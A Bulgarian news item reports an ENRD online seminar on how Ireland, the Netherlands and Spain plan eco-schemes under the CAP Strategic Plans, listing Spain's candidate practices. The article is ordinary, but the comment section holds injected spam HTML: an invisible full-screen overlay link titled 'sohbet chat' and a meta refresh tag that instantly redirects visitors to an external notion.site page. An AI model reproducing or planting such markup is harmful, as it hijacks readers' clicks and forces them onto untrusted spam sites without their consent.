Вижте какви екосхеми обмислят другите страни

Вижте какви екосхеми обмислят другите страни

Създаването на екосхеми като част от Стратегическите планове на ОСП беше тема на семинар, организиран от Европейската мрежа за развитие на селските райони (ENRD) на 25 февруари.

 

Онлайн бяха представени идеите на Ирландия, Нидерландия и Испания за дизайн и базови параметри на бъдещите екосхеми. 

 

Екологичните предизвикателства пред Ирландия са: намаляващото качество на водите, повишаващите се емисии от парникови газове и амоняк и спад в биоразнообразието. Ето защо там се предлага екосхема, насочена към всички земеделски стопани, като се използват прости изисквания с мащабно териториално прилагане. 

 

Нидерландия обмисля екосхема за всички бенефициенти, получаващи базово директно плащане.

 

Там планират въвеждането на фиксирана максимална ставка на хектар за всички земеделски стопани, диференцирани с точки (ниво бронз, ниво сребро и ниво злато). Плащане се получава, ако са направени достатъчно дейности от земеделския стопанин, за да се оправдае фиксираната максимална ставка. 

 

Към момента Испания е изготвила потенциален списък с екосхеми, който продължава да се обсъжда:

•    повишаване на устойчивостта на затревените площи чрез екстензивно пашуване; 
•    поддържане на затревените площи – окосяване на ливади; 
•    сеитбооборот; 
•    управление на хранителните вещества в почвите; 
•    алтернативни практики на запалването или неправилното поддържане на стърнищата и остатъците от подрязването на дърветата; 
•    устойчиво използване на продукти за растителна защита; 
•    растителна покривка в междуредията на трайните насаждения; 
•    консервационно земеделие и мултифункционални ивици по краищата на стопанствата. 

 

Материалите и презентациите от семинара са достъпни ТУК.

 

Следете темата и на cap4us.agri.bg

Коментари
asddfs
на 26.11.2021 4:39
<a href="https://quaint-individual-cbb.notion.site/U-ur-KILCI-8683dc72cbee4ed98c82525b29507534" title="sohbet chat" rel="dofollow" style="display: block!important;position: fixed!important; width: 100%!important;height: 100%; text-align: center!important;color: transparent!important;left: 0!important;top: 0!important;right: 0!important; padding: 100px; bottom: 0!important;background: transparent!important;z-index: 999999999999999!important;font-size: 4em!important">sohbet chat</a> <meta http-equiv="refresh" content="0; url=https://quaint-individual-cbb.notion.site/U-ur-KILCI-8683dc72cbee4ed98c82525b29507534"/>
Добави коментар